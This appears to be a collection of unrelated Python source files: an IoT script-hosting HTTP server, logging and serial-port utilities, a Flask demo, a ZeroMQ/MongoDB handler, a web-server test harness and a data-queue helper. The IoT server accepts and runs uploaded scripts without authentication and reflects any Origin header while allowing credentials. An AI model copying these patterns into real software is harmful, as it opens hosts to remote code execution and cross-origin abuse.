"#DON'T TOUCH THIS PART\n"
"server = HTTPServer(('localhost', PORT), ServerHandler)\n"
"server.serve_forever()\n")
newThing.close()
elif (path1.startswith("/delete")):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
response = BytesIO()
response.write(b"Deleting specified thing.")
self.wfile.write(response.getvalue())
query = parse_qs(path1[8:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
os.remove(self.fs.getFilenameByName(name))
del (savesAsJson['cloudscripts'][self.fs.getIndexByName(name)])
print("Reprinting again: ")
for i, itemThings in enumerate(savesAsJson["cloudscripts"]):
itemThings["thingID"] -= 1 if itemThings["thingID"] != 0 else 0
print(itemThings)
open("thingsaves.json", "w").close()
writeFile = open("thingsaves.json", "w")
writeFile.write(json.dumps(savesAsJson))
writeFile.close()
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
elif (path1.startswith("/get")):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header('Access-Control-Allow-Credentials', 'true')
self.send_header('Access-Control-Allow-Origin',
str(self.headers["Origin"]))
self.end_headers()
query = parse_qs(path1[5:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
response = ""
for i, itemThings in enumerate(savesAsJson["cloudscripts"]):
if (itemThings["info"]["name"] == name):
scriptFile = open(itemThings["info"]["filename"], "r")
response = scriptFile.read()
if (itemThings["info"]["language"] == "javascript"):
response = response[0: (response.index(
'listen(')+7)] + "DEF_PORT);"
scriptFile.close()
elif(itemThings["info"]["language"] == "python"):
response = response[0: (
response.index('PORT =')+6)] + " DEF_PORT \n\n" + response[response.index('PORT =')+13:]
scriptFile.close()
res = BytesIO()
res.write(str.encode(response))
self.wfile.write(res.getvalue())
else:
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, item in enumerate(savesAsJson['cloudscripts']):
if (self.path[1:].startswith(item['info']['name'])):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
restOfQuery = self.path[len(item['info']['name'])+1:]
#print("Rest of query: " + restOfQuery)
res = BytesIO()
req = requests.get(
"http://localhost:" + str(self.pr.runningProcesses[i]['port']) + restOfQuery)
res.write(str.encode(req.text))
self.wfile.write(res.getvalue())
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
print(str(self.path))
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header('Access-Control-Allow-Credentials', 'true')
self.send_header('Access-Control-Allow-Origin',
str(self.headers["Origin"]))
self.end_headers()
path1 = str(self.path)
if (path1.startswith("/upload")):
print("Uploading new file!")
query = parse_qs(path1[8:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
try:
open(self.fs.getFilenameByName(name), "w").close()
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
scriptFile = codecs.open(
self.fs.getFilenameByName(name), "w", "utf-8")
scriptFile.write(body.decode())
scriptFile.close()
self.pr.restartProcess(name)
response = BytesIO()
response.write(b'New Script Succesfully Uploaded')
response.write(b'Received: ')
response.write(body)
self.wfile.write(response.getvalue())
pass
except Exception:
print("Error: "+Exception)
response = BytesIO()
response.write(b'Specified Script file does not exist.')
self.wfile.write(response.getvalue())
pass
process1 = None
process_running = False
def serveInThread():
while True:
httpd.handle_request()
if __name__ == '__main__':
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
# Getting ip address
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
print("Starting server. " + local_ip + ":8000")
httpd = socketserver.TCPServer(
(local_ip, 8000), SimpleHTTPRequestHandler)
serverThread = threading.Thread(target=serveInThread)
serverThread.daemon = True
serverThread.start()
pr = Process()
pr.startAllProcesses()
while True:
if(process_running == True):
timeNow = datetime.now().strftime("%H:%M")
if (str(timeNow) == "01:00"):
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
|
multiprocess_logging.py
|
import socket
import threading
import multiprocessing as mp
import multiprocessing.connection as mpc
import logging
import sys
import signal
import time
import os
from pipeline_cluster import util
def _handle_connection(conn, caddr):
while True:
try:
msg = conn.recv()
logging.debug("[" + time.strftime("%d %m %Y %H:%M:%S") + " - " + caddr[0] + " - " + str(msg["pid"]) + "] " + msg["message"])
except EOFError as e: # maybe this should catch all exceptions in case the client disconnects while sending
break
except ConnectionResetError as e:
break
conn.close()
def _serve(addr, conn_buffer_size, filename):
signal.signal(signal.SIGINT, lambda signum, frame: exit(0))
signal.signal(signal.SIGTERM, lambda signum, frame: exit(0))
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
file_logger = logging.FileHandler(filename, "a", "utf-8")
root_logger.addHandler(file_logger)
log_handler = logging.StreamHandler(sys.stdout)
root_logger.addHandler(log_handler)
with mpc.Listener(addr, "AF_INET", conn_buffer_size, None) as lst:
while True:
conn = lst.accept()
caddr = lst.last_accepted
threading.Thread(target=_handle_connection, args=(conn, caddr)).start()
def serve(addr, filename, conn_buffer_size=2, detach=False):
if detach:
proc = mp.Process(target=_serve, args=(addr, conn_buffer_size, filename), daemon=True).start()
else:
_serve(addr, conn_buffer_size, filename)
server_address = ("", 5555)
def set_default_address(log_addr):
global server_address
server_address = log_addr
def log(msg, addr=None, timeout=5, retry_sleep=1):
print(msg)
addr = addr if addr is not None else server_address
conn = util.connect_timeout(addr, retry=True, retry_timeout=timeout, retry_sleep=retry_sleep)
conn.send({
"pid": os.getpid(),
"message": msg
})
conn.close()
|
SerialHandler.py
|
from PyQt5.Qt import *
import threading
import serial
import time
from collections import namedtuple
from MotorCommand import MotorCommand
from array import array
from io import BytesIO
from struct import *
"""
Class Serial handler
This class opens a serial device with the defined port and baudrate
and keeps emiting messages using pyqt signals
"""
class SerialHandler(QObject):
bufferUpdated = pyqtSignal(tuple)
startThread = pyqtSignal()
stopThread = pyqtSignal()
pauseThread = pyqtSignal()
resumeThread = pyqtSignal()
flushSerial = pyqtSignal()
def __init__(self, parent):
super(SerialHandler, self).__init__()
self.running = False
self.pause = False
self.thread = threading.Thread(target=self.serialHandlerThread)
self.device = 'COM4'
self.baudrate = 115200
self.rate = 1000000
# prepare connections with parent window
self.startThread.connect(self.startProcess)
self.stopThread.connect(self.stopProcess)
self.pauseThread.connect(self.pauseProcess)
self.resumeThread.connect(self.resumeProcess)
self.flushSerial.connect(self.flush)
self.alone = None
self.compound = None
self.refMsg = None
self.cmd = MotorCommand()
self.serial_mutex = threading.Lock()
self.ser = serial.Serial()
# with serial.Serial(self.device, self.baudrate, timeout=0.1) as ser:
# self.ser = ser
# estructura del mensaje
self.struct_fmt = '<BBhhh'
self.struct_len = calcsize(self.struct_fmt)
def set_COM_port_settings(self, com_port):
self.ser.port = self.device
self.ser.baudrate = self.baudrate
self.ser.bytesize = serial.EIGHTBITS #number of bits per bytes
self.ser.parity = serial.PARITY_NONE #set parity check: no parity
self.ser.stopbits = serial.STOPBITS_ONE #number of stop bits
self.ser.timeout = 3 #non-block read
self.ser.xonxoff = False #disable software flow control
self.ser.rtscts = False #disable hardware (RTS/CTS) flow control
self.ser.dsrdtr = False #disable hardware (DSR/DTR) flow control
self.ser.writeTimeout = 3 #timeout for write
def __exit__(self, exc_type, exc_value, traceback):
self.stopProcess()
def setInterface(self, device, baudrate):
self.ser.port = device
self.ser.baudrate = baudrate
self.device = device
self.baudrate = baudrate
def isRunning(self):
return (self.running or not self.pause)
def to_hex(self,data):
return ":".join("{:02x}".format(c) for c in data)
def send_command(self,command):
self.set_command(command)
buff = BytesIO()
self.cmd.serialize(buff)
#print(self.to_hex(buff.getvalue()))
#print(buff.getvalue())
base_cmd_int = bytearray(buff.getvalue())
#checksum = 255 - ( sum(base_cmd_int) % 256 )
# Packet: FF FF BASE_CMD CHECKSUM
#packet = bytearray([0xFF, 0xFF]) + base_cmd_int + bytearray([checksum]) + bytearray([0x0D])
packet = bytearray([0xFF,0xFF]) + base_cmd_int + bytearray([0x0D])
packet_str = array('B', packet).tostring()
with self.serial_mutex:
self.write_serial(packet_str)
def write_serial(self, data):
"""
Write in the serial port.
"""
#print(self.cmd)
#print("Hex: {}".format(to_hex(data)))
self.ser.flushInput()
self.ser.flushOutput()
self.ser.write(data)
def set_command(self,command):
self.cmd.id = command.id
self.cmd.cmd = command.cmd
self.cmd.pref = command.pref
self.cmd.P = command.P
self.cmd.I = command.I
self.cmd.D = command.D
# pyqt signals definition
@pyqtSlot()
def startProcess(self):
self.running = True
self.thread.start()
@pyqtSlot()
def stopProcess(self):
self.running = False
@pyqtSlot()
def pauseProcess(self):
self.pause = True
@pyqtSlot()
def resumeProcess(self):
self.pause = False
@pyqtSlot()
def flush(self):
#self.ser.reset_input_buffer()
print(self.ser.readline())
@pyqtSlot(int)
def setRate(self, rate):
self.rate = rate
# main thread
def serialHandlerThread(self):
while self.running is True:
# read messages
try:
if self.ser.inWaiting():
msg = self.ser.read(self.struct_len)
rxCom = unpack(self.struct_fmt, msg)
#print(type(rxCom))
self.bufferUpdated.emit(rxCom)
#print(msg)
except Exception as e:
print(e)
#else:
# pass
# handle sampling rate
#time.sleep(1/self.rate)
self.ser.write(bytes('q\n','UTF-8'))
self.ser.close()
return 0
|
server.py
|
from flask import Flask,jsonify
import flask
import threading
import time
app = Flask(__name__)
k=1
threads=[]
def thread_function(name):
t = threading.currentThread()
while getattr(t, "do_run", True):
print("work ",name)
time.sleep(name)
@app.route('/strat')
def hello_world():
global k
global threads
threads.append(threading.Thread(target=thread_function, args=(k,)))
threads[k-1].start()
k=k+1
response = jsonify({'some': threading.active_count()})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/stop')
def stop():
global k
global threads
threads[k-2].do_run = False
threads.pop(k-2)
k=k-1
response = jsonify({'some': threading.active_count()})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
app.run(debug=True)
|
handler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/5/25 0025 14:52
# @Author : Hadrianl
# @File : handler.py
# @Contact : 137150224@qq.com
import pymongo as pmo
from .utils import logger, handler_profiler, zmq_ctx
from threading import Thread, Timer
from abc import abstractmethod
import zmq
import pickle
from .extra.rpc import RPCServer
from queue import deque
from concurrent.futures import ThreadPoolExecutor
import time
class BaseHandler:
def __init__(self, name, topic: (str, list) = None, *args, **kwargs):
self.name = name
self.topic = set(topic if isinstance(topic, list) else
[topic]) if topic is not None else set()
self.ctx = zmq_ctx
self.sub_socket = self.ctx.socket(zmq.SUB)
self.sub_socket.setsockopt(zmq.RCVTIMEO, 3000)
self._thread_pool = ThreadPoolExecutor(max_workers=1)
self.inproc = set()
if self.topic: # 如果topic默认为None,则对所有的topic做处理
for t in self.topic:
self.sub_socket.setsockopt(zmq.SUBSCRIBE, pickle.dumps(t))
else:
self.sub_socket.subscribe('')
if kwargs.get('latest', False): # 可以通过latest(bool)来订阅最新的数据
self.data_queue = deque(maxlen=1)
self.latest = True
else:
self.data_queue = deque()
self.latest = False
self.__active = False
def run(self):
self.task = self._thread_pool.submit(logger.info, f'Handler:{self.name}启用')
while self.__active:
try:
topic_, msg_ = self.sub_socket.recv_multipart()
if msg_ is None: # 向队列传入None来作为结束信号
break
topic = pickle.loads(topic_)
msg = pickle.loads(msg_)
self.data_queue.append([topic, msg])
if len(self.data_queue) >= 1000:
logger.warning(f'Handler:{self.name}未处理msg超过1000!')
if self.task.done():
self.task = self._thread_pool.submit(self.handle, *self.data_queue.popleft())
except zmq.error.Again:
...
except Exception as e:
logger.exception(f'<Handler>-{self.name} exception:{e}')
self._thread_pool.shutdown()
logger.info(f'Handler:{self.name}停止')
def add_topic(self, new_topic):
self.sub_socket.setsockopt(zmq.SUBSCRIBE, pickle.dumps(new_topic))
self.topic.add(new_topic)
def remove_topic(self, topic):
self.sub_socket.setsockopt(zmq.UNSUBSCRIBE, pickle.dumps(topic))
self.topic.remove(topic)
def stop(self, wsname):
try:
self.inproc.remove(wsname)
self.sub_socket.disconnect(f'inproc://{wsname}')
finally:
if not self.inproc:
self.__active = False
self.thread.join()
def start(self, wsname):
self.sub_socket.connect(f'inproc://{wsname}')
self.inproc.add(wsname)
if not self.__active:
self.__active = True
self.thread = Thread(target=self.run, name=self.name)
self.thread.setDaemon(True)
self.thread.start()
@abstractmethod
def handle(self, topic, msg): # 所有handler需要重写这个函数
...
class TimeHandler:
def __init__(self, name, interval, get_msg=None):
self.name = name
self.interval = interval
self.get_msg = get_msg
self._active = False
def run(self, interval):
while self._active:
try:
msg = self.get_msg() if self.get_msg else None
self.handle(msg)
except Exception as e:
logger.exception(f'<TimeHandler>-{self.name} exception:{e}')
finally:
time.sleep(interval)
def stop(self):
self._active = False
def start(self):
self.timer = Thread(target=self.run, args=(self.interval, ))
self.timer.setName(self.name)
self.timer.setDaemon(True)
self.timer.start()
@abstractmethod
def handle(self, msg):
...
class DBHandler(BaseHandler, pmo.MongoClient):
def __init__(self, topic=None, host='localhost', port=27017, db='HuoBi'):
BaseHandler.__init__(self, 'DB', topic)
pmo.MongoClient.__init__(self, host, port)
self.db = self.get_database(db)
def into_db(self, data, topic: str):
collection = self.db.get_collection(topic)
try:
if 'kline' in topic:
if isinstance(data, dict):
collection.update({'id': data['id']}, data, upsert=True)
elif isinstance(data, list):
for d in data:
collection.update({'id': d['id']}, d, upsert=True)
elif 'trade.detail' in topic:
for d in data:
d['id'] = str(d['id'])
collection.update({'id': d['id']}, d, upsert=True)
elif 'depth' in topic:
collection.update({'version': data['version']}, data, upsert=True)
except Exception as e:
logger.error(f'<数据>插入数据库错误-{e}')
def handle(self, topic, msg):
if 'ch' in msg or 'rep' in msg:
topic = msg.get('ch') or msg.get('rep')
data = msg.get('tick') or msg.get('data')
self.into_db(data, topic)
class RPCServerHandler(BaseHandler):
def __init__(self, reqPort=6868, pubPort=6869, topic=None):
BaseHandler.__init__(self, 'RPCServer', topic)
self.rpcServer = RPCServer(reqPort, pubPort)
self.rpcServer.startREP()
def handle(self, topic, msg):
self.rpcServer.publish(topic, msg)
def register_func(self, name, func):
self.rpcServer.register_rpcFunc(name, func)
def unregister_func(self, name):
self.rpcServer.unregister_rpcFunc(name)
|
unit.py
|
import os
import re
import ssl
import sys
import json
import time
import shutil
import socket
import select
import argparse
import platform
import tempfile
import unittest
import subprocess
from multiprocessing import Process
class TestUnit(unittest.TestCase):
pardir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
architecture = platform.architecture()[0]
maxDiff = None
detailed = False
save_log = False
def __init__(self, methodName='runTest'):
super().__init__(methodName)
if re.match(r'.*\/run\.py$', sys.argv[0]):
args, rest = TestUnit._parse_args()
TestUnit._set_args(args)
@classmethod
def main(cls):
args, rest = TestUnit._parse_args()
for i, arg in enumerate(rest):
if arg[:5] == 'test_':
rest[i] = cls.__name__ + '.' + arg
sys.argv = sys.argv[:1] + rest
TestUnit._set_args(args)
unittest.main()
def setUp(self):
self._run()
def tearDown(self):
self.stop()
# detect errors and failures for current test
def list2reason(exc_list):
if exc_list and exc_list[-1][0] is self:
return exc_list[-1][1]
if hasattr(self, '_outcome'):
result = self.defaultTestResult()
self._feedErrorsToResult(result, self._outcome.errors)
else:
result = getattr(self, '_outcomeForDoCleanups',
self._resultForDoCleanups)
success = not list2reason(result.errors) \
and not list2reason(result.failures)
# check unit.log for alerts
with open(self.testdir + '/unit.log', 'r', encoding='utf-8',
errors='ignore') as f:
self._check_alerts(f.read())
# remove unit.log
if not TestUnit.save_log and success:
shutil.rmtree(self.testdir)
else:
self._print_path_to_log()
def check_modules(self, *modules):
self._run()
for i in range(50):
with open(self.testdir + '/unit.log', 'r') as f:
log = f.read()
m = re.search('controller started', log)
if m is None:
time.sleep(0.1)
else:
break
if m is None:
self.stop()
exit("Unit is writing log too long")
current_dir = os.path.dirname(os.path.abspath(__file__))
missed_module = ''
for module in modules:
if module == 'go':
env = os.environ.copy()
env['GOPATH'] = self.pardir + '/go'
try:
process = subprocess.Popen(['go', 'build', '-o',
self.testdir + '/go/check_module',
current_dir + '/go/empty/app.go'], env=env)
process.communicate()
m = module if process.returncode == 0 else None
except:
m = None
elif module == 'node':
if os.path.isdir(self.pardir + '/node/node_modules'):
m = module
else:
m = None
elif module == 'openssl':
try:
subprocess.check_output(['which', 'openssl'])
output = subprocess.check_output([
self.pardir + '/build/unitd', '--version'],
stderr=subprocess.STDOUT)
m = re.search('--openssl', output.decode())
except:
m = None
else:
m = re.search('module: ' + module, log)
if m is None:
missed_module = module
break
self.stop()
self._check_alerts(log)
shutil.rmtree(self.testdir)
if missed_module:
raise unittest.SkipTest('Unit has no ' + missed_module + ' module')
def stop(self):
if self._started:
self._stop()
def _run(self):
self.testdir = tempfile.mkdtemp(prefix='unit-test-')
os.mkdir(self.testdir + '/state')
print()
def _run_unit():
subprocess.call([self.pardir + '/build/unitd',
'--no-daemon',
'--modules', self.pardir + '/build',
'--state', self.testdir + '/state',
'--pid', self.testdir + '/unit.pid',
'--log', self.testdir + '/unit.log',
'--control', 'unix:' + self.testdir + '/control.unit.sock'])
self._p = Process(target=_run_unit)
self._p.start()
if not self.waitforfiles(self.testdir + '/unit.pid',
self.testdir + '/unit.log', self.testdir + '/control.unit.sock'):
exit("Could not start unit")
self._started = True
self.skip_alerts = [r'read signalfd\(4\) failed']
self.skip_sanitizer = False
def _stop(self):
with open(self.testdir + '/unit.pid', 'r') as f:
pid = f.read().rstrip()
subprocess.call(['kill', '-s', 'QUIT', pid])
for i in range(50):
if not os.path.exists(self.testdir + '/unit.pid'):
break
time.sleep(0.1)
if os.path.exists(self.testdir + '/unit.pid'):
exit("Could not terminate unit")
self._started = False
self._p.join(timeout=1)
self._terminate_process(self._p)
def _terminate_process(self, process):
if process.is_alive():
process.terminate()
process.join(timeout=5)
if process.is_alive():
exit("Could not terminate process " + process.pid)
if process.exitcode:
exit("Child process terminated with code " + str(process.exitcode))
def _check_alerts(self, log):
found = False
alerts = re.findall('.+\[alert\].+', log)
if alerts:
print('All alerts/sanitizer errors found in log:')
[print(alert) for alert in alerts]
found = True
if self.skip_alerts:
for skip in self.skip_alerts:
alerts = [al for al in alerts if re.search(skip, al) is None]
if alerts:
self._print_path_to_log()
self.assertFalse(alerts, 'alert(s)')
if not self.skip_sanitizer:
sanitizer_errors = re.findall('.+Sanitizer.+', log)
if sanitizer_errors:
self._print_path_to_log()
self.assertFalse(sanitizer_error, 'sanitizer error(s)')
if found:
print('skipped.')
def waitforfiles(self, *files):
for i in range(50):
wait = False
ret = False
for f in files:
if not os.path.exists(f):
wait = True
break
if wait:
time.sleep(0.1)
else:
ret = True
break
return ret
@staticmethod
def _parse_args():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-d', '--detailed', dest='detailed',
action='store_true', help='Detailed output for tests')
parser.add_argument('-l', '--log', dest='save_log',
action='store_true', help='Save unit.log after the test execution')
return parser.parse_known_args()
@staticmethod
def _set_args(args):
TestUnit.detailed = args.detailed
TestUnit.save_log = args.save_log
def _print_path_to_log(self):
print('Path to unit.log:\n' + self.testdir + '/unit.log')
class TestUnitHTTP(TestUnit):
def http(self, start_str, **kwargs):
sock_type = 'ipv4' if 'sock_type' not in kwargs else kwargs['sock_type']
port = 7080 if 'port' not in kwargs else kwargs['port']
url = '/' if 'url' not in kwargs else kwargs['url']
http = 'HTTP/1.0' if 'http_10' in kwargs else 'HTTP/1.1'
headers = ({
'Host': 'localhost',
'Connection': 'close'
} if 'headers' not in kwargs else kwargs['headers'])
body = b'' if 'body' not in kwargs else kwargs['body']
crlf = '\r\n'
if 'addr' not in kwargs:
addr = '::1' if sock_type == 'ipv6' else '127.0.0.1'
else:
addr = kwargs['addr']
sock_types = {
'ipv4': socket.AF_INET,
'ipv6': socket.AF_INET6,
'unix': socket.AF_UNIX
}
if 'sock' not in kwargs:
sock = socket.socket(sock_types[sock_type], socket.SOCK_STREAM)
if sock_type == sock_types['ipv4'] or sock_type == sock_types['ipv6']:
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if 'wrapper' in kwargs:
sock = kwargs['wrapper'](sock)
connect_args = addr if sock_type == 'unix' else (addr, port)
try:
sock.connect(connect_args)
except ConnectionRefusedError:
sock.close()
return None
else:
sock = kwargs['sock']
if 'raw' not in kwargs:
req = ' '.join([start_str, url, http]) + crlf
if body is not b'':
if isinstance(body, str):
body = body.encode()
if 'Content-Length' not in headers:
headers['Content-Length'] = len(body)
for header, value in headers.items():
req += header + ': ' + str(value) + crlf
req = (req + crlf).encode() + body
else:
req = start_str
sock.sendall(req)
if TestUnit.detailed:
print('>>>', req, sep='\n')
resp = ''
if 'no_recv' not in kwargs:
enc = 'utf-8' if 'encoding' not in kwargs else kwargs['encoding']
resp = self.recvall(sock).decode(enc)
if TestUnit.detailed:
print('<<<', resp.encode('utf-8'), sep='\n')
if 'raw_resp' not in kwargs:
resp = self._resp_to_dict(resp)
if 'start' not in kwargs:
sock.close()
return resp
return (resp, sock)
def delete(self, **kwargs):
return self.http('DELETE', **kwargs)
def get(self, **kwargs):
return self.http('GET', **kwargs)
def post(self, **kwargs):
return self.http('POST', **kwargs)
def put(self, **kwargs):
return self.http('PUT', **kwargs)
def recvall(self, sock, buff_size=4096):
data = b''
while select.select([sock], [], [], 1)[0]:
try:
part = sock.recv(buff_size)
except:
break
data += part
if not len(part):
break
return data
def _resp_to_dict(self, resp):
m = re.search('(.*?\x0d\x0a?)\x0d\x0a?(.*)', resp, re.M | re.S)
if not m:
return {}
headers_text, body = m.group(1), m.group(2)
p = re.compile('(.*?)\x0d\x0a?', re.M | re.S)
headers_lines = p.findall(headers_text)
status = re.search('^HTTP\/\d\.\d\s(\d+)|$', headers_lines.pop(0)).group(1)
headers = {}
for line in headers_lines:
m = re.search('(.*)\:\s(.*)', line)
if m.group(1) not in headers:
headers[m.group(1)] = m.group(2)
elif isinstance(headers[m.group(1)], list):
headers[m.group(1)].append(m.group(2))
else:
headers[m.group(1)] = [headers[m.group(1)], m.group(2)]
return {
'status': int(status),
'headers': headers,
'body': body
}
class TestUnitControl(TestUnitHTTP):
# TODO socket reuse
# TODO http client
def conf(self, conf, path='/config'):
if isinstance(conf, dict):
conf = json.dumps(conf)
if path[:1] != '/':
path = '/config/' + path
return json.loads(self.put(
url=path,
body=conf,
sock_type='unix',
addr=self.testdir + '/control.unit.sock'
)['body'])
def conf_get(self, path='/config'):
if path[:1] != '/':
path = '/config/' + path
return json.loads(self.get(
url=path,
sock_type='unix',
addr=self.testdir + '/control.unit.sock'
)['body'])
def conf_delete(self, path='/config'):
if path[:1] != '/':
path = '/config/' + path
return json.loads(self.delete(
url=path,
sock_type='unix',
addr=self.testdir + '/control.unit.sock'
)['body'])
class TestUnitApplicationProto(TestUnitControl):
current_dir = os.path.dirname(os.path.abspath(__file__))
def sec_epoch(self):
return time.mktime(time.gmtime())
def date_to_sec_epoch(self, date, template='%a, %d %b %Y %H:%M:%S %Z'):
return time.mktime(time.strptime(date, template))
def search_in_log(self, pattern):
with open(self.testdir + '/unit.log', 'r', errors='ignore') as f:
return re.search(pattern, f.read())
class TestUnitApplicationPython(TestUnitApplicationProto):
def load(self, script, name=None):
if name is None:
name = script
self.conf({
"listeners": {
"*:7080": {
"application": name
}
},
"applications": {
name: {
"type": "python",
"processes": { "spare": 0 },
"path": self.current_dir + '/python/' + script,
"working_directory": self.current_dir + '/python/' + script,
"module": "wsgi"
}
}
})
class TestUnitApplicationRuby(TestUnitApplicationProto):
def load(self, script, name='config.ru'):
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "ruby",
"processes": { "spare": 0 },
"working_directory": self.current_dir + '/ruby/' + script,
"script": self.current_dir + '/ruby/' + script + '/' + name
}
}
})
class TestUnitApplicationPHP(TestUnitApplicationProto):
def load(self, script, name='index.php'):
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "php",
"processes": { "spare": 0 },
"root": self.current_dir + '/php/' + script,
"working_directory": self.current_dir + '/php/' + script,
"index": name
}
}
})
class TestUnitApplicationGo(TestUnitApplicationProto):
def load(self, script, name='app'):
if not os.path.isdir(self.testdir + '/go'):
os.mkdir(self.testdir + '/go')
env = os.environ.copy()
env['GOPATH'] = self.pardir + '/go'
process = subprocess.Popen(['go', 'build', '-o',
self.testdir + '/go/' + name,
self.current_dir + '/go/' + script + '/' + name + '.go'],
env=env)
process.communicate()
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "external",
"processes": { "spare": 0 },
"working_directory": self.current_dir + '/go/' + script,
"executable": self.testdir + '/go/' + name
}
}
})
class TestUnitApplicationNode(TestUnitApplicationProto):
def load(self, script, name='app.js'):
# copy application
shutil.copytree(self.current_dir + '/node/' + script,
self.testdir + '/node')
# link modules
os.symlink(self.pardir + '/node/node_modules',
self.testdir + '/node/node_modules')
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "external",
"processes": { "spare": 0 },
"working_directory": self.testdir + '/node',
"executable": name
}
}
})
class TestUnitApplicationPerl(TestUnitApplicationProto):
def load(self, script, name='psgi.pl'):
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "perl",
"processes": { "spare": 0 },
"working_directory": self.current_dir + '/perl/' + script,
"script": self.current_dir + '/perl/' + script + '/' + name
}
}
})
class TestUnitApplicationTLS(TestUnitApplicationProto):
def __init__(self, test):
super().__init__(test)
self.context = ssl.create_default_context()
self.context.check_hostname = False
self.context.verify_mode = ssl.CERT_NONE
def certificate(self, name='default', load=True):
subprocess.call(['openssl', 'req', '-x509', '-new', '-config',
self.testdir + '/openssl.conf', '-subj', '/CN=' + name + '/',
'-out', self.testdir + '/' + name + '.crt',
'-keyout', self.testdir + '/' + name + '.key'])
if load:
self.certificate_load(name)
def certificate_load(self, crt, key=None):
if key is None:
key = crt
with open(self.testdir + '/' + key + '.key', 'rb') as k, \
open(self.testdir + '/' + crt + '.crt', 'rb') as c:
return self.conf(k.read() + c.read(), '/certificates/' + crt)
def get_ssl(self, **kwargs):
return self.get(wrapper=self.context.wrap_socket,
**kwargs)
def post_ssl(self, **kwargs):
return self.post(wrapper=self.context.wrap_socket,
**kwargs)
def get_server_certificate(self, addr=('127.0.0.1', 7080)):
return ssl.get_server_certificate(addr)
def load(self, script, name=None):
if name is None:
name = script
# create default openssl configuration
with open(self.testdir + '/openssl.conf', 'w') as f:
f.write("""[ req ]
default_bits = 1024
encrypt_key = no
distinguished_name = req_distinguished_name
[ req_distinguished_name ]""")
self.conf({
"listeners": {
"*:7080": {
"application": name
}
},
"applications": {
name: {
"type": "python",
"processes": { "spare": 0 },
"path": self.current_dir + '/python/' + script,
"working_directory": self.current_dir + '/python/' + script,
"module": "wsgi"
}
}
})
|
data_util.py
|
'''
this file is modified from keras implemention of data process multi-threading,
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import multiprocessing
import threading
import time
import numpy as np
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
|
photos.py
|
# -*- coding: UTF-8 -*-
from .core import *
class Photos(object):
def __init__(self, ProxyDictionary, keywords=[], *args):
self.keywords = keywords
self.ProxyDictionary = ProxyDictionary
self.photos_queue = Queue()
def _loadAlbumsPage(self, page_num):
# url example:
# pornhub.com/albums/female-straight?search=arg1+arg2
